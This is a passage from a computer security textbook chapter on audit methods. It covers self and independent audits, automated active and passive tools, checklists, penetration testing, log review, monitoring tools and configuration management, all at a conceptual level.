7.12 Basic Audit Methods and Tools 221
Chapter 7
the auditor cringe, the auditor should remember that he or she is there to
provide guidance, in the form of reviews and recommendations for
improvement, to help the problem go away. Question everything, but be
nice about it.
7.12 Basic Audit Methods and Tools
Operational assurance is the process of reviewing an operational system to
see that security controls, both automated and manual, are functioning cor-
rectly and effectively [9]. To maintain operational assurance, organizations
use two basic methods: system audits and monitoring. These terms are used
loosely within the computer security community and often overlap. A sys-
tem audit is a periodic event used to evaluate security. An audit conducted
to support operational assurance examines whether the system is meeting
stated or implied security requirements, including system and organization
policies. Some audits will also examine whether security requirements are
appropriate for an organization, based on the risks identified in a risk analy-
sis process. Less formal audits are sometimes called security reviews.
Audits can be self-administered or performed by independent parties
(either internal or external to the organization). Both types of audit can pro-
vide an organization with excellent information about their technical, proce-
dural, managerial, and other related aspects of security. The essential
difference between a self-audit and an independent audit is objectivity.
Reviews done by system management staff, often called self-audits or self-
assessments, have an inherent conflict of interest. The system management
staff may have little incentive to say the computer system was poorly designed
or is sloppily operated. On the other hand, they may be motivated by a strong
desire to improve the security of the system. In addition, they are knowledge-
able about the system and may be able to find hidden problems.
The independent auditor, by contrast, should have no professional stake
in the system. The independent auditor has nothing to gain from the out-
come (good or bad) of an audit. An independent audit should be per-
formed by a professional, reputable audit firm, and done in accordance
with generally accepted auditing standards. Many methods and tools, some
of which are described below, can be used to audit a system.
7.12.1 Automated Tools
For small multiuser computer systems, it is a big job to manually review
security features. Using automated tools makes it possible to review com-
222 7.12 Basic Audit Methods and Tools
puter systems, small or large, for a variety of security flaws. Generally, there
are two types of automated tools used by an auditor:
1. Active tools, which find vulnerabilities by trying to exploit them
2. Passive tests, which examine the system and infer problems from
the state of the system
Automated tools can be used to help find many threats and vulnerabili-
ties, like improper access controls or weak access control configurations,
weak passwords, lack of integrity of the system software, or not using proper
software updates and patches. These tools are very successful at finding vul-
nerabilities and are sometimes used by hackers to break into systems. Systems
administrators are encouraged to use automated tools as much as possible.
Frequent use of such tools allows for early detection and remediation of
problems and should be a part of the daily routine for an administrator.
Passive testing can assist an auditor in the review of controls put in place
in an IS organization and help determine whether they are effective or not.
The auditor will often need to analyze both the computer and noncom-
puter-based controls. Techniques used to accomplish this task include
inquiry, observation, and testing (of the controls and the data). The audit
can frequently detect illegal acts, errors, irregularities, or a lack of compli-
ance with laws and regulations. Security checklists and penetration testing,
discussed below, may also be used to assist in the audit.
7.12.2 Security Checklists
An organization’s site security plan outlines the major security consider-
ations for a system, including management, operational, and technical
issues. One advantage of using a computer security plan is that it reflects
the unique security environment of the system, rather than a generic list of
controls. Checklists should be developed using the security plan as the
framework for the depth and breadth of the audit. Other checklists can also
be developed that include organizational security policies and practices.
Lists of “generally accepted security practices” obtained from outside
sources can also be used. When using standardized or best-practice check-
lists, it is important to review them with some consideration of the fact that
deviations from their prescribed standards may not be considered wrong.
They may be appropriate for the system’s unique environment or technical
constraints. Checklists can also be used to verify that changes to a system
7.12 Basic Audit Methods and Tools 223
Chapter 7
have been reviewed from a security perspective. A general audit should
examine the system’s configuration to validate whether or not any major
changes have occurred that have not yet been analyzed from a security point
of view.
7.12.3 Penetration Testing
Penetration testing is used to attempt a system break-in for the purpose of
discovering vulnerabilities in the protection controls in place at an organiza-
tion. Penetration testing often is done using automated tools, but it can also
be done manually. Security experts advocate penetration testing that mimics
methods that would be employed by a real hacker making intrusion
attempts against a system. For host systems on the Internet, this would cer-
tainly include automated tools. For many systems, poor security procedures
or a lack of internal controls on applications are common vulnerabilities
that penetration testing can target.
7.12.4 Monitoring Methods and Tools
Security monitoring should be an ongoing activity. Its purpose is to look for
vulnerabilities and security problems that may exist in the security controls
implemented by the organization. Many monitoring methods are similar to
those used for audits, but monitoring is performed on a more frequent
basis. In some instances, monitoring uses automated tools and is performed
in real time on a continual basis.
7.12.4.1 Review of System Logs
A periodic review of system-generated logs can detect security problems,
including attempts to exceed access authority or gain system access during
unusual hours. It is a good practice to have log-checking integrated into the
daily routine for systems administrators. The chances of detecting intru-
sions are much greater with a better log-checking program put into opera-
tion within an organization.
7.12.4.2 Automated Monitoring Tools
Several types of automated tools can be used to monitor a system for secu-
rity problems. Some examples are shown in Figure 7.8.
224 7.12 Basic Audit Methods and Tools
7.12.5 Configuration Management
From a security point of view, configuration management provides assur-
ance that the system in operation is the correct version (configuration) of
the system, and that any changes to be made are reviewed for security
implications. Configuration management can be used to help ensure that
changes take place in an identifiable and controlled environment and that
they do not unintentionally harm any of the system’s properties, including
its security. Some organizations, particularly those with very large systems,
use a configuration control board for configuration management. When
such a board exists, it is helpful to have a computer security expert partici-
pate. In any case, it is useful to have computer security managers participate
in system management decision making. Changes to the system can have
security implications because they may introduce or remove vulnerabilities
and because significant changes may require updating the contingency
plan, risk analysis, or accreditation.
Figure 7.8
Some automated
tools used in the
audit process.
Virus scanners, which are programs that test for the presence of
viruses in executable program files.
Checksumming, which works under the assumption that program
files should not change between updates. Checksumming is a pro-
cess whereby a mathematical value based on the contents of a par-
ticular file is generated. To verify the integrity of the file, the
checksum is generated on demand for a specific file and compared
with the previously generated value for that file. If the two values
are equal, the integrity of the file is verified.
Password crackers, tools that check passwords against a known list
of “bad or weak” passwords. Crackers can also check passwords
against common permutations of the user ID.
Intrusion detectors, programs that analyze a system audit trail, espe-
cially logons, connections, operating system calls, and various com-
mand parameters, for activity that could represent unauthorized
activity. Intrusion detection is covered in Chapter 6 of this book.
System performance monitoring, which analyzes system perfor-
mance logs in real time to look for availability problems, including
active attacks (such as the Slammer worm) and system and network
slowdowns and crashes.
..................Content has been hidden....................
You can't read the all page of ebook, please click here login for view all page.